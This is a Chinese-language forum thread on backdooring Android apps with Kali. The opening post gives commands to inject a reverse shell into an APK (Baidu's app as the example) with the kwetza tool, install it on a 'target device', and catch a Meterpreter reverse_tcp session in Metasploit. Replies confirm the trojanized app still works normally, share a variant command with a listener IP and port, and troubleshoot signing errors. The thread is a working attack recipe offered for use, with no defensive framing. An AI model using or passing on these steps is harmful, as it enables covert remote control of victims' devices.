admin 发表于 2019-6-13 21:22:42

kali给APP添加shell


git clone https://github.com/sensepost/kwetza
cd kwetza
python kwetza.py baidu.apk 监听者IP 监听端口 yes

#这里选取了百度的apk文件做测试
随便输入一个密码
得到新生成的apk文件
将注入完成的apk文件安装在目标设备
也可以本机
xdg-open baidu.apk

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 监听者IP
set lport 监听端口
exploit

小黄人 发表于 2019-6-17 08:48:52

感谢分享!学习了!

Richard 发表于 2019-6-25 12:31:10

这个给APP安装了后门后,影响原APP的正常运行吗?

admin 发表于 2019-6-25 14:56:07

Richard 发表于 2019-6-25 04:31
这个给APP安装了后门后,影响原APP的正常运行吗?

不影响!

qwe 发表于 2019-7-21 15:33:36

本帖最后由 qwe 于 2019-7-21 15:37 编辑

是版本的原因吗,我只能这样执行python kwetza.py PokemonDuel.apk tcp 192.168.10.6 4444 yes AssistActivity

admin 发表于 2019-7-21 16:20:58

qwe 发表于 2019-7-21 07:33
是版本的原因吗,我只能这样执行

发个图片我看看!

qwe 发表于 2019-7-23 20:42:44

本帖最后由 qwe 于 2019-7-23 20:53 编辑

必须要加https/tcp 后面加AssistActivity才可以

admin 发表于 2019-7-24 15:39:39

qwe 发表于 2019-7-23 12:42
必须要加https/tcp 后面加AssistActivity才可以

嗯嗯!

bystart 发表于 2020-7-27 11:20:04

Exception in thread "main" java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuffer;

jarsigner 错误: java.lang.RuntimeException: 密钥库加载: Keystore was tampered with, or password was incorrect

这两个错误怎么解决呀

admin 发表于 2020-7-27 12:46:18

bystart 发表于 2020-7-27 03:20
Exception in thread "main" java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuf ...

你换个APP试下,有的APP是加壳的,是没法添加后门的。
页: [1]
查看完整版本: kali给APP添加shell